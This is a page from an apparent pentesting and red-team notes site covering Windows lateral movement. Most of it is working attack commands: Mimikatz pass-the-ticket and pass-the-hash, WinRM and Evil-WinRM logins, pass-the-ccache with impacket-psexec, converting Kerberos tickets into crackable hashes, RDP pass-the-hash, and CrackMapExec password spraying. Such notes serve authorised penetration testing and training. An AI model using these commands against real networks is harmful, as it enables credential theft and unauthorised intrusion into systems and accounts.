🧙
Pentesting & Red Teaming Notes
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  • Mimikatz Ticket PTT
  • WinRM
  • PTH with Mimikatz
  • Pass The Ccache (PTC)
  • Cracking Ccache
  • RDP
  • CrackMapExec
  1. Windows

Lateral Movement

There aren't many ways to move laterally on windows. Below are the main ones.

  • psexec

  • RDP

  • WinRM

  • SSH(not likely)

PTH(pass the hash) can be used most of the time.

Mimikatz Ticket PTT

Enable-PSRemoting
mimikatz.exe '" kerberos:ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORP

WinRM

$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }

# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp

PTH with Mimikatz

Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'

Pass The Ccache (PTC)

Grab the ccache from remote and put into environment variable

export KRB5CCNAME=/home/morph3/Desktop/krb5cc_012345678_XXXX

Make sure the times are synced up with the DC

sudo ntpdate -u 192.168.1.231

Psexec to the target

impacket-psexec morph3@dc01.domain.local -dc-ip 192.168.1.231 -k -no-pass

** Don't include domain name in psexec. If you are having issues with the command you may remove the username as well.

Cracking Ccache

Convert the ccache file into kirbi file using a converter.

python2 /opt/ticket_converter/ticket_converter.py krb5cc_012345678_XXXX ticket.kirbi

Convert kirbi to crackable hash.

python3 /opt/kerberoast/kirbi2john.py ticket.kirbi | tee ticket_hash.txt

RDP

Impacket's rdp_check.py script is good.

impacket-rdp_check morph3:Password123@1.3.3.7
python3 /opt/impacket/examples/rdp_check.py ecorp/morph3@1.3.3.7
xfreerdp /u:morph3 /p:Password123 /v:1.3.3.7
xfreerdp /u:morph3  /pth:08df3c74ded740e1f2bcf5dea4b8daf6  /v:1.3.3.7
rdesktop 1.3.3.7 -u Administrator -p 123456

CrackMapExec

Swiss-knife tool for password spraying.

crackmapexec smb ./ips.txt -u ./users -H hashes --local-auth
crackmapexec smb 1.3.3.7  -u ./users -p ./passwords --continue-on-success --shares
PreviousKerberoastingNextMSSQL

Last updated 2 years ago

I use

https://github.com/zer1t0/ticket_converter
https://github.com/nidem/kerberoast
https://github.com/jarilaos/kirbi2hashcat/blob/master/kirbi2hashcat.py
https://github.com/byt3bl33d3r/CrackMapExec